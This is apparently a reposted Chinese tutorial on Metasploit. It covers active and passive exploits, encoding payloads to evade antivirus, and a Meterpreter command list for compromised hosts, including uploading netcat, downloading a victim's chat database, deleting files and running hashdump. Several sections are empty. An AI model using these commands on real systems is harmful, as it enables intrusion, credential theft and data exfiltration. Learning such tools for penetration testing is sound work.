Metasploit常用命令、技術(shù)功能模塊?
Metasploit——輔助模塊(Auxiliary)?
目錄
1.Exploit模塊
2.生成Payload?
3.Meterpreter常用命令
4.弱點(diǎn)掃描
?1.Exploit模塊
Active exploits主動(dòng):攻擊者主動(dòng)向目標(biāo)發(fā)起漏洞利用代碼,觸發(fā)漏洞
??????????? 目標(biāo)開(kāi)放一個(gè)端口(服務(wù)),允許外界計(jì)算機(jī)連接這個(gè)端口(訪問(wèn)這個(gè)服務(wù)),通常被稱為
??????????? 某種服務(wù)器(比如開(kāi)放80,http,稱為web服務(wù)器;開(kāi)放21,ftp,稱為ftp服務(wù)器)。
???????????? A發(fā)送某種類型的漏洞利用代碼給B,這個(gè)漏洞利用代碼利用之后,加載payload,在B
??????????? 上執(zhí)行payload之后,有兩種情況:
???????????? 1.在B上再打開(kāi)一個(gè)payload開(kāi)放的shell偵聽(tīng)端口
???????????? 2.B不開(kāi)放端口,它會(huì)反向連接A的一個(gè)端口
Passive exploits被動(dòng):在這種情況下,B是不會(huì)開(kāi)放端口的,即使開(kāi)放了端口也是不存在漏洞
????????的,它的漏洞存在于本機(jī)的一些客戶端軟件(比如瀏覽器、PDF閱讀器、Java的客戶端程
????????序),不會(huì)偵聽(tīng)一個(gè)端口,也不會(huì)提供一個(gè)服務(wù)。
??????? 既然是客戶端,他就要去訪問(wèn)一個(gè)某些服務(wù)器上的一些服務(wù),當(dāng)它訪問(wèn)的時(shí)候,如果服
????????務(wù)器端上放置了一個(gè)漏洞利用代碼的話,由于客戶程序存在漏洞,當(dāng)使用存在漏洞的客
????????戶端程序訪問(wèn)了一些存在了exploits漏洞利用代碼的服務(wù)器端程序,也會(huì)導(dǎo)致服務(wù)器端
????????exploits漏洞利用的代碼,由于B請(qǐng)求A,就作為A的響應(yīng)報(bào)文把漏洞利用代碼內(nèi)容返回給
????????B,造成客戶端程序漏洞被利用,然后payload加載,
??????? 1.本地綁定一個(gè)偵聽(tīng)端口,等攻擊者連接;
??????? 2.本地不偵聽(tīng)端口,反彈連接給A偵聽(tīng)的另外一個(gè)端口,連接后,B就把shell給A
注:攻擊者誘使你用存在漏洞的客戶端程序,訪問(wèn)存在漏洞利用代碼的服務(wù)端程序(惡意偽造
????????的站點(diǎn)),把漏洞利用代碼從惡意服務(wù)器端下載到本地,執(zhí)行,導(dǎo)致本地客戶端程序被利
????????用,導(dǎo)致payload加載,出現(xiàn)反彈的shell或直連的shell。
?
判斷主動(dòng)還是被動(dòng),是看漏洞利用代碼,是主動(dòng)發(fā)過(guò)去的,還是被動(dòng)等待客戶端連接服務(wù)器端而造成客戶端漏洞被利用
實(shí)驗(yàn):關(guān)閉目標(biāo)win7的防火墻,主動(dòng)發(fā)起漏洞利用代碼,可以拿到shell
實(shí)驗(yàn):開(kāi)啟目標(biāo)win xp sp2的防火墻,無(wú)法主動(dòng)連接目標(biāo)了,所以利用被動(dòng)連接方式
??????????? 需要?jiǎng)?chuàng)建一個(gè)存在exploits漏洞利用代碼的站點(diǎn)(網(wǎng)站),誘使客戶端來(lái)連接這個(gè)網(wǎng)站。
??????????? 利用了xp sp2上瀏覽器的漏洞
2.生成Payload?
繞過(guò)壞字符,就是將其編碼,一定程度上起到混淆,免殺的效果
search encoders搜索有哪些編碼
?
?-b排除壞字符,-t輸出文件格式,-e指定encoder,-i使用5輪,-k線程,-x模板,-f輸出文件
示例:generate -t c -s 30
?????????? generate -t python -s 30
3.Meterpreter常用命令
- 高級(jí)、動(dòng)態(tài)、可擴(kuò)展的Payload
??????? 基于meterpreter上下文利用更多漏洞發(fā)起攻擊
??????? 后滲透測(cè)試階段一站式操作界面
- 完全基于內(nèi)存的DLL注入時(shí)payload(不寫硬盤)
??????? 注入到合法系統(tǒng)進(jìn)程并建立stager
??????? 基于Stager上傳和預(yù)加載DLL進(jìn)行擴(kuò)展模塊注入(客戶端API)
??????? 基于Stager建立的socket連接建立加密的TLS/1.0通信隧道
??????? 利用TLS隧道進(jìn)一步加載后續(xù)擴(kuò)展模塊(避免網(wǎng)絡(luò)取證)
- 服務(wù)端使用C語(yǔ)言編寫
- 客戶端提供基于Ruby的全特效API(支持任何語(yǔ)言)
?
help # 查看Meterpreter幫助
background #返回,把meterpreter后臺(tái)掛起
bgkill # 殺死一個(gè)背景 meterpreter 腳本
bglist #提供所有正在運(yùn)行的后臺(tái)腳本的列表
bgrun #作為一個(gè)后臺(tái)線程運(yùn)行腳本
channel #顯示活動(dòng)頻道
sessions -i number #與會(huì)話進(jìn)行交互,number表示第n個(gè)session,使用session -i 連接到指定序號(hào)的meterpreter #會(huì)話已繼續(xù)利用
sesssions -k number #與會(huì)話進(jìn)行交互
close #關(guān)閉通道
exit #終止 meterpreter 會(huì)話
quit #終止 meterpreter 會(huì)話
interact id #切換進(jìn)一個(gè)信道
run #執(zhí)行一個(gè)已有的模塊,這里要說(shuō)的是輸入run后按兩下tab,會(huì)列出所有的已有的腳本,常用的有
#autoroute,hashdump,arp_scanner,multi_meter_inject等
irb #進(jìn)入 Ruby 腳本模式
read #從通道讀取數(shù)據(jù)
write #將數(shù)據(jù)寫入到一個(gè)通道
run和bgrun #前臺(tái)和后臺(tái)執(zhí)行以后它選定的 meterpreter 腳本
use #加載 meterpreter 的擴(kuò)展
load/use #加載模塊
Resource #執(zhí)行一個(gè)已有的rc腳本
-----------------------------------------------------------------------
文件系統(tǒng)命令
cat c:\boot.ini #查看文件內(nèi)容,文件必須存在
del c:\boot.ini #刪除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上傳文件到目標(biāo)機(jī)主上,如upload setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/ # 下載文件到本機(jī)上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini # 編輯文件
getlwd #打印本地目錄
getwd #打印工作目錄
lcd #更改本地目錄
ls #列出在當(dāng)前目錄中的文件列表
lpwd #打印本地目錄
pwd #輸出工作目錄
cd c:\\ #進(jìn)入目錄文件下
rm file #刪除文件
mkdir dier #在受害者系統(tǒng)上的創(chuàng)建目錄
rmdir #受害者系統(tǒng)上刪除目錄
dir #列出目標(biāo)主機(jī)的文件和文件夾信息
mv #修改目標(biāo)主機(jī)上的文件名
search -d d:\\www -f web.config #search 文件,如search -d c:\\ -f*.doc
meterpreter > search -f autoexec.bat #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops #用戶登錄數(shù)
遷移
?Meterpreter python擴(kuò)展
4.弱點(diǎn)掃描
?
?
?
?
?文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-502726.html
?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-502726.html
到了這里,關(guān)于Metasploit——滲透攻擊模塊(Exploit)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!